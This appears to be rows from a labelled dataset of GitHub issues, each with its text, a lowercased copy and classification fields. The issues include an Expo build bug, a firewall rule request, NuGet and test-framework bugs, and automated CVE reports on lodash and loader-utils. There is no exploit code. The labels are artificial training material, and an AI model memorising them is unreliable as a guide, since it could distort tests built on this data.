### Build/Submit details page URL _No response_ ### Summary I have some new devices that I want to add to my build. I also have an old device that I want to remove. I did all this on apple's dev site and then I've been trying to do a build with EAS. No matter what I do (revoke all certs, create new certs, etc.) I still get the device list from before I made the changes. I've even tried to update the profiles after EAS creates them on apple's site, but it just reverts the device list to the incorrect devices when I go to do a build. ### Managed or bare? Managed ### Environment expo-env-info 1.0.5 environment info: System: OS: macOS 12.5.1 Shell: 5.8.1 - /bin/zsh Binaries: Node: 16.13.0 - /usr/local/bin/node Yarn: 3.2.0 - /usr/local/bin/yarn npm: 8.1.0 - /usr/local/bin/npm Managers: CocoaPods: 1.11.3 - /opt/homebrew/bin/pod SDKs: iOS SDK: Platforms: DriverKit 21.4, iOS 16.0, macOS 12.3, tvOS 16.0, watchOS 9.0 IDEs: Xcode: 14.0.1/14A400 - /usr/bin/xcodebuild Expo Workflow: managed ### Error output _No response_ ### Reproducible demo or steps to reproduce from a blank project ¯\_(ツ)_/¯
1.0
showing old device list, unable to add new devices - ### Build/Submit details page URL _No response_ ### Summary I have some new devices that I want to add to my build. I also have an old device that I want to remove. I did all this on apple's dev site and then I've been trying to do a build with EAS. No matter what I do (revoke all certs, create new certs, etc.) I still get the device list from before I made the changes. I've even tried to update the profiles after EAS creates them on apple's site, but it just reverts the device list to the incorrect devices when I go to do a build. ### Managed or bare? Managed ### Environment expo-env-info 1.0.5 environment info: System: OS: macOS 12.5.1 Shell: 5.8.1 - /bin/zsh Binaries: Node: 16.13.0 - /usr/local/bin/node Yarn: 3.2.0 - /usr/local/bin/yarn npm: 8.1.0 - /usr/local/bin/npm Managers: CocoaPods: 1.11.3 - /opt/homebrew/bin/pod SDKs: iOS SDK: Platforms: DriverKit 21.4, iOS 16.0, macOS 12.3, tvOS 16.0, watchOS 9.0 IDEs: Xcode: 14.0.1/14A400 - /usr/bin/xcodebuild Expo Workflow: managed ### Error output _No response_ ### Reproducible demo or steps to reproduce from a blank project ¯\_(ツ)_/¯
non_priority
showing old device list unable to add new devices build submit details page url no response summary i have some new devices that i want to add to my build i also have an old device that i want to remove i did all this on apple s dev site and then i ve been trying to do a build with eas no matter what i do revoke all certs create new certs etc i still get the device list from before i made the changes i ve even tried to update the profiles after eas creates them on apple s site but it just reverts the device list to the incorrect devices when i go to do a build managed or bare managed environment expo env info environment info system os macos shell bin zsh binaries node usr local bin node yarn usr local bin yarn npm usr local bin npm managers cocoapods opt homebrew bin pod sdks ios sdk platforms driverkit ios macos tvos watchos ides xcode usr bin xcodebuild expo workflow managed error output no response reproducible demo or steps to reproduce from a blank project ¯ ツ ¯
0
2,248
3,749,688,554
IssuesEvent
2016-03-11 01:17:18
sudomesh/sudowrt-firmware
https://api.github.com/repos/sudomesh/sudowrt-firmware
closed
Don't forward traffic to upstream lan
bug important security
If someone puts a mesh node behind their lan, the current status is that it will allow forwarding from the mesh subnet to devices on their lan. The simple and reasonably quick fix is to drop any traffic from the mesh subnet to any non-publicly routable subnet (except for the mesh subnet of course): ``` # Don't forward any traffic from mesh to upstream lan iptables -A FORWARD -s $MESHNET -d $UPSTREAMLAN -j DROP ``` Where `$UPSTREAMLAN` would be `192.168.0.0/16` and `10.0.0.0/8` (we're already using 172.16.0.0/12 for our "private" network)
True
Don't forward traffic to upstream lan - If someone puts a mesh node behind their lan, the current status is that it will allow forwarding from the mesh subnet to devices on their lan. The simple and reasonably quick fix is to drop any traffic from the mesh subnet to any non-publicly routable subnet (except for the mesh subnet of course): ``` # Don't forward any traffic from mesh to upstream lan iptables -A FORWARD -s $MESHNET -d $UPSTREAMLAN -j DROP ``` Where `$UPSTREAMLAN` would be `192.168.0.0/16` and `10.0.0.0/8` (we're already using 172.16.0.0/12 for our "private" network)
non_priority
don t forward traffic to upstream lan if someone puts a mesh node behind their lan the current status is that it will allow forwarding from the mesh subnet to devices on their lan the simple and reasonably quick fix is to drop any traffic from the mesh subnet to any non publicly routable subnet except for the mesh subnet of course don t forward any traffic from mesh to upstream lan iptables a forward s meshnet d upstreamlan j drop where upstreamlan would be and we re already using for our private network
0
346,695
30,991,021,987
IssuesEvent
2023-08-09 04:41:49
arpit1102/JAN-Soen6011summer2023
https://api.github.com/repos/arpit1102/JAN-Soen6011summer2023
closed
Test the integration of the database with the backend operations to ensure accurate data storage and retrieval.
task testing
This is a sub task for User Story Description : This task involves testing the integration between the database and the backend operations. It should validate that data is stored and retrieved Story Points : 3
1.0
Test the integration of the database with the backend operations to ensure accurate data storage and retrieval. - This is a sub task for User Story Description : This task involves testing the integration between the database and the backend operations. It should validate that data is stored and retrieved Story Points : 3
non_priority
test the integration of the database with the backend operations to ensure accurate data storage and retrieval this is a sub task for user story description this task involves testing the integration between the database and the backend operations it should validate that data is stored and retrieved story points
0
135,718
12,690,408,412
IssuesEvent
2020-06-21 11:59:45
ucl-candi/DeepReg
https://api.github.com/repos/ucl-candi/DeepReg
opened
Create a command line app + docs to generate config files from argparse.
documentation enhancement good first issue
#### Issue description Currently, the package depends on .yaml files / config paths to run registrations. It would be useful to create a guide and CLI app for users to generate their own configuration files to customise trainings. ## Type of issue Please delete options that are not relevant. - [ ] Bug report - [x] New feature request - [x] Documentation update - [ ] Test request - [ ] Linting request #### For bug report or feature request, steps to reproduce the issue, including (but not limited to): N/A #### What's the expected result? 1. A CLI is provided which can be called to generate the necessary config files required with their own parameters 2. A guide informing on what information is needed in these config files and why they are required. #### What's the actual result? Users currently have to design yaml files manually by inspecting yaml files provided in deepreg/config. It's not entirely clear what these parameters are or why they are necessary, what expected range should be required or how wrong values could break the training - I would assume the guesswork involved could prove quite frustrating at the end point. #### Additional details / screenshot
1.0
Create a command line app + docs to generate config files from argparse. - #### Issue description Currently, the package depends on .yaml files / config paths to run registrations. It would be useful to create a guide and CLI app for users to generate their own configuration files to customise trainings. ## Type of issue Please delete options that are not relevant. - [ ] Bug report - [x] New feature request - [x] Documentation update - [ ] Test request - [ ] Linting request #### For bug report or feature request, steps to reproduce the issue, including (but not limited to): N/A #### What's the expected result? 1. A CLI is provided which can be called to generate the necessary config files required with their own parameters 2. A guide informing on what information is needed in these config files and why they are required. #### What's the actual result? Users currently have to design yaml files manually by inspecting yaml files provided in deepreg/config. It's not entirely clear what these parameters are or why they are necessary, what expected range should be required or how wrong values could break the training - I would assume the guesswork involved could prove quite frustrating at the end point. #### Additional details / screenshot
non_priority
create a command line app docs to generate config files from argparse issue description currently the package depends on yaml files config paths to run registrations it would be useful to create a guide and cli app for users to generate their own configuration files to customise trainings  type of issue please delete options that are not relevant bug report new feature request documentation update test request linting request for bug report or feature request steps to reproduce the issue including but not limited to n a what s the expected result a cli is provided which can be called to generate the necessary config files required with their own parameters a guide informing on what information is needed in these config files and why they are required what s the actual result users currently have to design yaml files manually by inspecting yaml files provided in deepreg config it s not entirely clear what these parameters are or why they are necessary what expected range should be required or how wrong values could break the training i would assume the guesswork involved could prove quite frustrating at the end point additional details screenshot
0
3,495
5,938,883,972
IssuesEvent
2017-05-25 02:11:19
parksandwildlife/biosys-turtles
https://api.github.com/repos/parksandwildlife/biosys-turtles
opened
Define which activities are displayed in W2
Functional Requirement should have
### Source Name requesting role or stakeholder from which this requirement was sourced: * PENV #16 ### Requirement PENV suggest: There should be a SOP on defining activities that are available to enter (toggle "display observation" on activity).
1.0
Define which activities are displayed in W2 - ### Source Name requesting role or stakeholder from which this requirement was sourced: * PENV #16 ### Requirement PENV suggest: There should be a SOP on defining activities that are available to enter (toggle "display observation" on activity).
non_priority
define which activities are displayed in source name requesting role or stakeholder from which this requirement was sourced penv requirement penv suggest there should be a sop on defining activities that are available to enter toggle display observation on activity
0
278,876
24,182,641,935
IssuesEvent
2022-09-23 10:20:23
NuGet/Home
https://api.github.com/repos/NuGet/Home
opened
[Bug]: [Bug Bash] The info showing in Output window should be consistent with the one showing in Options window when clearing NuGet Storage
Type:Bug Found:ManualTests Triage:Untriaged
### NuGet Product Used Visual Studio Package Management UI ### Product Version Dev\6.4.0.97 ### Worked before? _No response_ ### Impact It bothers me. A fix would be nice ### Repro Steps & Context #### Details about Problem VS Version: Main\32922.386 NuGet Version: Dev\6.4.0.97 OS Version: Windows-11-Enterprise-21H2 ENU #### Detailed repro steps 1. Create a “C# Console App (.NET 7.0)” project in VS. 2. Right-Click the project in the Solution Explorer window and select ‘Manage NuGet Packages…’. 3. Click the “Browse” tab and install some packages into this project. 4. Click the settings button on the top-right of PM UI to open the Options window. 5. Go to NuGet Package Manager->General tab and click the “Clear All NuGet Storage” button. 6. Close the Options window after the clearing completed and go to Output window. #### Expected The info should be “NuGet storage cleared.” In Output window. #### Actual The info is “Local resources cleared” in Output window. That’s inconsistent with the info showing in Options dialog as below screenshot. ![image](https://user-images.githubusercontent.com/20632625/191940479-1fe14a71-b12a-4e86-b0fe-c127ef9f3ed3.png) #### Notes: It is not a regression since it reproes on D16.11\32802.440. ### Verbose Logs _No response_
1.0
[Bug]: [Bug Bash] The info showing in Output window should be consistent with the one showing in Options window when clearing NuGet Storage - ### NuGet Product Used Visual Studio Package Management UI ### Product Version Dev\6.4.0.97 ### Worked before? _No response_ ### Impact It bothers me. A fix would be nice ### Repro Steps & Context #### Details about Problem VS Version: Main\32922.386 NuGet Version: Dev\6.4.0.97 OS Version: Windows-11-Enterprise-21H2 ENU #### Detailed repro steps 1. Create a “C# Console App (.NET 7.0)” project in VS. 2. Right-Click the project in the Solution Explorer window and select ‘Manage NuGet Packages…’. 3. Click the “Browse” tab and install some packages into this project. 4. Click the settings button on the top-right of PM UI to open the Options window. 5. Go to NuGet Package Manager->General tab and click the “Clear All NuGet Storage” button. 6. Close the Options window after the clearing completed and go to Output window. #### Expected The info should be “NuGet storage cleared.” In Output window. #### Actual The info is “Local resources cleared” in Output window. That’s inconsistent with the info showing in Options dialog as below screenshot. ![image](https://user-images.githubusercontent.com/20632625/191940479-1fe14a71-b12a-4e86-b0fe-c127ef9f3ed3.png) #### Notes: It is not a regression since it reproes on D16.11\32802.440. ### Verbose Logs _No response_
non_priority
the info showing in output window should be consistent with the one showing in options window when clearing nuget storage nuget product used visual studio package management ui product version dev worked before no response impact it bothers me a fix would be nice repro steps context details about problem vs version main nuget version dev os version windows enterprise enu detailed repro steps create a “c console app net ” project in vs right click the project in the solution explorer window and select ‘manage nuget packages…’ click the “browse” tab and install some packages into this project click the settings button on the top right of pm ui to open the options window go to nuget package manager general tab and click the “clear all nuget storage” button close the options window after the clearing completed and go to output window expected the info should be “nuget storage cleared ” in output window actual the info is “local resources cleared” in output window that’s inconsistent with the info showing in options dialog as below screenshot notes it is not a regression since it reproes on verbose logs no response
0
139,178
18,841,293,955
IssuesEvent
2021-11-11 09:52:30
sultanabubaker/Yarn_Test_Sultan
https://api.github.com/repos/sultanabubaker/Yarn_Test_Sultan
closed
CVE-2019-10744 (High) detected in lodash-4.17.4.tgz - autoclosed
security vulnerability
## CVE-2019-10744 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>lodash-4.17.4.tgz</b></p></summary> <p>Lodash modular utilities.</p> <p>Library home page: <a href="https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz">https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz</a></p> <p>Path to dependency file: Yarn_Test_Sultan/package.json</p> <p>Path to vulnerable library: /node_modules/lodash/package.json</p> <p> Dependency Hierarchy: - :x: **lodash-4.17.4.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/sultanabubaker/Yarn_Test_Sultan/commit/2a7e0bbd1ae9787391eccf6541666773919e6b44">2a7e0bbd1ae9787391eccf6541666773919e6b44</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. <p>Publish Date: 2019-07-26 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2019-10744>CVE-2019-10744</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/advisories/GHSA-jf85-cpcp-j695">https://github.com/advisories/GHSA-jf85-cpcp-j695</a></p> <p>Release Date: 2019-07-26</p> <p>Fix Resolution: lodash-4.17.12, lodash-amd-4.17.12, lodash-es-4.17.12, lodash.defaultsdeep-4.6.1, lodash.merge- 4.6.2, lodash.mergewith-4.6.2, lodash.template-4.5.0</p> </p> </details> <p></p> *** <!-- REMEDIATE-OPEN-PR-START --> - [ ] Check this box to open an automated fix PR <!-- REMEDIATE-OPEN-PR-END --> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"javascript/Node.js","packageName":"lodash","packageVersion":"4.17.4","packageFilePaths":["/package.json"],"isTransitiveDependency":false,"dependencyTree":"lodash:4.17.4","isMinimumFixVersionAvailable":true,"minimumFixVersion":"lodash-4.17.12, lodash-amd-4.17.12, lodash-es-4.17.12, lodash.defaultsdeep-4.6.1, lodash.merge- 4.6.2, lodash.mergewith-4.6.2, lodash.template-4.5.0"}],"baseBranches":["master"],"vulnerabilityIdentifier":"CVE-2019-10744","vulnerabilityDetails":"Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2019-10744","cvss3Severity":"high","cvss3Score":"9.1","cvss3Metrics":{"A":"High","AC":"Low","PR":"None","S":"Unchanged","C":"None","UI":"None","AV":"Network","I":"High"},"extraData":{}}</REMEDIATE> -->
True
CVE-2019-10744 (High) detected in lodash-4.17.4.tgz - autoclosed - ## CVE-2019-10744 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>lodash-4.17.4.tgz</b></p></summary> <p>Lodash modular utilities.</p> <p>Library home page: <a href="https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz">https://registry.npmjs.org/lodash/-/lodash-4.17.4.tgz</a></p> <p>Path to dependency file: Yarn_Test_Sultan/package.json</p> <p>Path to vulnerable library: /node_modules/lodash/package.json</p> <p> Dependency Hierarchy: - :x: **lodash-4.17.4.tgz** (Vulnerable Library) <p>Found in HEAD commit: <a href="https://github.com/sultanabubaker/Yarn_Test_Sultan/commit/2a7e0bbd1ae9787391eccf6541666773919e6b44">2a7e0bbd1ae9787391eccf6541666773919e6b44</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. <p>Publish Date: 2019-07-26 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2019-10744>CVE-2019-10744</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>9.1</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: High - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://github.com/advisories/GHSA-jf85-cpcp-j695">https://github.com/advisories/GHSA-jf85-cpcp-j695</a></p> <p>Release Date: 2019-07-26</p> <p>Fix Resolution: lodash-4.17.12, lodash-amd-4.17.12, lodash-es-4.17.12, lodash.defaultsdeep-4.6.1, lodash.merge- 4.6.2, lodash.mergewith-4.6.2, lodash.template-4.5.0</p> </p> </details> <p></p> *** <!-- REMEDIATE-OPEN-PR-START --> - [ ] Check this box to open an automated fix PR <!-- REMEDIATE-OPEN-PR-END --> <!-- <REMEDIATE>{"isOpenPROnVulnerability":false,"isPackageBased":true,"isDefaultBranch":true,"packages":[{"packageType":"javascript/Node.js","packageName":"lodash","packageVersion":"4.17.4","packageFilePaths":["/package.json"],"isTransitiveDependency":false,"dependencyTree":"lodash:4.17.4","isMinimumFixVersionAvailable":true,"minimumFixVersion":"lodash-4.17.12, lodash-amd-4.17.12, lodash-es-4.17.12, lodash.defaultsdeep-4.6.1, lodash.merge- 4.6.2, lodash.mergewith-4.6.2, lodash.template-4.5.0"}],"baseBranches":["master"],"vulnerabilityIdentifier":"CVE-2019-10744","vulnerabilityDetails":"Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.","vulnerabilityUrl":"https://vuln.whitesourcesoftware.com/vulnerability/CVE-2019-10744","cvss3Severity":"high","cvss3Score":"9.1","cvss3Metrics":{"A":"High","AC":"Low","PR":"None","S":"Unchanged","C":"None","UI":"None","AV":"Network","I":"High"},"extraData":{}}</REMEDIATE> -->
non_priority
cve high detected in lodash tgz autoclosed cve high severity vulnerability vulnerable library lodash tgz lodash modular utilities library home page a href path to dependency file yarn test sultan package json path to vulnerable library node modules lodash package json dependency hierarchy x lodash tgz vulnerable library found in head commit a href found in base branch master vulnerability details versions of lodash lower than are vulnerable to prototype pollution the function defaultsdeep could be tricked into adding or modifying properties of object prototype using a constructor payload publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution lodash lodash amd lodash es lodash defaultsdeep lodash merge lodash mergewith lodash template check this box to open an automated fix pr isopenpronvulnerability false ispackagebased true isdefaultbranch true packages istransitivedependency false dependencytree lodash isminimumfixversionavailable true minimumfixversion lodash lodash amd lodash es lodash defaultsdeep lodash merge lodash mergewith lodash template basebranches vulnerabilityidentifier cve vulnerabilitydetails versions of lodash lower than are vulnerable to prototype pollution the function defaultsdeep could be tricked into adding or modifying properties of object prototype using a constructor payload vulnerabilityurl
0
275,370
23,910,496,610
IssuesEvent
2022-09-09 07:43:16
eclipse/kiso-testing
https://api.github.com/repos/eclipse/kiso-testing
closed
Auxiliaries are not cleaned up properly inside the unittests
bug size L test
*In order to* less side effects in the unittests *we want to* have a clean exit within the meta path for auxiliaries For example: If the auxiliaries have the same name inside following unittest test_config_registry_and_test_execution.py Pykiso tries to rerun a stopped and uninstalled auxiliary instead of creating a new one. This will lead to dangling Threads any pytest wont stop. This can't happen in a real world pykiso test. Anyways auxiliaries should be cleaned up properly from the meta path auf uninstall, so that the dynamic loader creates a fresh instance during the next setup calls **Update** Seems that running multiple yaml files causes the same issue
1.0
Auxiliaries are not cleaned up properly inside the unittests - *In order to* less side effects in the unittests *we want to* have a clean exit within the meta path for auxiliaries For example: If the auxiliaries have the same name inside following unittest test_config_registry_and_test_execution.py Pykiso tries to rerun a stopped and uninstalled auxiliary instead of creating a new one. This will lead to dangling Threads any pytest wont stop. This can't happen in a real world pykiso test. Anyways auxiliaries should be cleaned up properly from the meta path auf uninstall, so that the dynamic loader creates a fresh instance during the next setup calls **Update** Seems that running multiple yaml files causes the same issue
non_priority
auxiliaries are not cleaned up properly inside the unittests in order to less side effects in the unittests we want to have a clean exit within the meta path for auxiliaries for example if the auxiliaries have the same name inside following unittest test config registry and test execution py pykiso tries to rerun a stopped and uninstalled auxiliary instead of creating a new one this will lead to dangling threads any pytest wont stop this can t happen in a real world pykiso test anyways auxiliaries should be cleaned up properly from the meta path auf uninstall so that the dynamic loader creates a fresh instance during the next setup calls update seems that running multiple yaml files causes the same issue
0
220,654
24,565,367,938
IssuesEvent
2022-10-13 02:09:00
hiagorios/charlib
https://api.github.com/repos/hiagorios/charlib
opened
CVE-2022-37599 (Medium) detected in multiple libraries
security vulnerability
## CVE-2022-37599 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>loader-utils-1.2.3.tgz</b>, <b>loader-utils-1.4.0.tgz</b>, <b>loader-utils-2.0.0.tgz</b></p></summary> <p> <details><summary><b>loader-utils-1.2.3.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-1.2.3.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-1.2.3.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/resolve-url-loader/node_modules/loader-utils/package.json,/node_modules/adjust-sourcemap-loader/node_modules/loader-utils/package.json</p> <p> Dependency Hierarchy: - build-angular-0.1101.2.tgz (Root Library) - resolve-url-loader-3.1.2.tgz - :x: **loader-utils-1.2.3.tgz** (Vulnerable Library) </details> <details><summary><b>loader-utils-1.4.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/babel-loader/node_modules/loader-utils/package.json,/node_modules/stylus-loader/node_modules/loader-utils/package.json,/node_modules/mini-css-extract-plugin/node_modules/loader-utils/package.json,/node_modules/worker-plugin/node_modules/loader-utils/package.json,/node_modules/webpack/node_modules/loader-utils/package.json,/node_modules/postcss-loader/node_modules/loader-utils/package.json</p> <p> Dependency Hierarchy: - build-angular-0.1101.2.tgz (Root Library) - worker-plugin-5.0.0.tgz - :x: **loader-utils-1.4.0.tgz** (Vulnerable Library) </details> <details><summary><b>loader-utils-2.0.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/loader-utils/package.json</p> <p> Dependency Hierarchy: - build-angular-0.1101.2.tgz (Root Library) - :x: **loader-utils-2.0.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/hiagorios/charlib/commit/8ee6e7aabcbf9c99ef1a7ed2ea015f0e838e7f1d">8ee6e7aabcbf9c99ef1a7ed2ea015f0e838e7f1d</a></p> <p>Found in base branch: <b>main</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js. <p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37599>CVE-2022-37599</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2022-37599 (Medium) detected in multiple libraries - ## CVE-2022-37599 - Medium Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>loader-utils-1.2.3.tgz</b>, <b>loader-utils-1.4.0.tgz</b>, <b>loader-utils-2.0.0.tgz</b></p></summary> <p> <details><summary><b>loader-utils-1.2.3.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-1.2.3.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-1.2.3.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/resolve-url-loader/node_modules/loader-utils/package.json,/node_modules/adjust-sourcemap-loader/node_modules/loader-utils/package.json</p> <p> Dependency Hierarchy: - build-angular-0.1101.2.tgz (Root Library) - resolve-url-loader-3.1.2.tgz - :x: **loader-utils-1.2.3.tgz** (Vulnerable Library) </details> <details><summary><b>loader-utils-1.4.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/babel-loader/node_modules/loader-utils/package.json,/node_modules/stylus-loader/node_modules/loader-utils/package.json,/node_modules/mini-css-extract-plugin/node_modules/loader-utils/package.json,/node_modules/worker-plugin/node_modules/loader-utils/package.json,/node_modules/webpack/node_modules/loader-utils/package.json,/node_modules/postcss-loader/node_modules/loader-utils/package.json</p> <p> Dependency Hierarchy: - build-angular-0.1101.2.tgz (Root Library) - worker-plugin-5.0.0.tgz - :x: **loader-utils-1.4.0.tgz** (Vulnerable Library) </details> <details><summary><b>loader-utils-2.0.0.tgz</b></p></summary> <p>utils for webpack loaders</p> <p>Library home page: <a href="https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz">https://registry.npmjs.org/loader-utils/-/loader-utils-2.0.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/loader-utils/package.json</p> <p> Dependency Hierarchy: - build-angular-0.1101.2.tgz (Root Library) - :x: **loader-utils-2.0.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/hiagorios/charlib/commit/8ee6e7aabcbf9c99ef1a7ed2ea015f0e838e7f1d">8ee6e7aabcbf9c99ef1a7ed2ea015f0e838e7f1d</a></p> <p>Found in base branch: <b>main</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Vulnerability Details</summary> <p> A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js. <p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37599>CVE-2022-37599</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>5.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve medium detected in multiple libraries cve medium severity vulnerability vulnerable libraries loader utils tgz loader utils tgz loader utils tgz loader utils tgz utils for webpack loaders library home page a href path to dependency file package json path to vulnerable library node modules resolve url loader node modules loader utils package json node modules adjust sourcemap loader node modules loader utils package json dependency hierarchy build angular tgz root library resolve url loader tgz x loader utils tgz vulnerable library loader utils tgz utils for webpack loaders library home page a href path to dependency file package json path to vulnerable library node modules babel loader node modules loader utils package json node modules stylus loader node modules loader utils package json node modules mini css extract plugin node modules loader utils package json node modules worker plugin node modules loader utils package json node modules webpack node modules loader utils package json node modules postcss loader node modules loader utils package json dependency hierarchy build angular tgz root library worker plugin tgz x loader utils tgz vulnerable library loader utils tgz utils for webpack loaders library home page a href path to dependency file package json path to vulnerable library node modules loader utils package json dependency hierarchy build angular tgz root library x loader utils tgz vulnerable library found in head commit a href found in base branch main vulnerability details a regular expression denial of service redos flaw was found in function interpolatename in interpolatename js in webpack loader utils via the resourcepath variable in interpolatename js publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href step up your open source security game with mend
0
268,426
28,565,972,534
IssuesEvent
2023-04-21 02:09:14
andygonzalez2010/store
https://api.github.com/repos/andygonzalez2010/store
closed
CVE-2021-3807 (High) detected in ansi-regex-3.0.0.tgz, ansi-regex-4.1.0.tgz - autoclosed
Mend: dependency security vulnerability
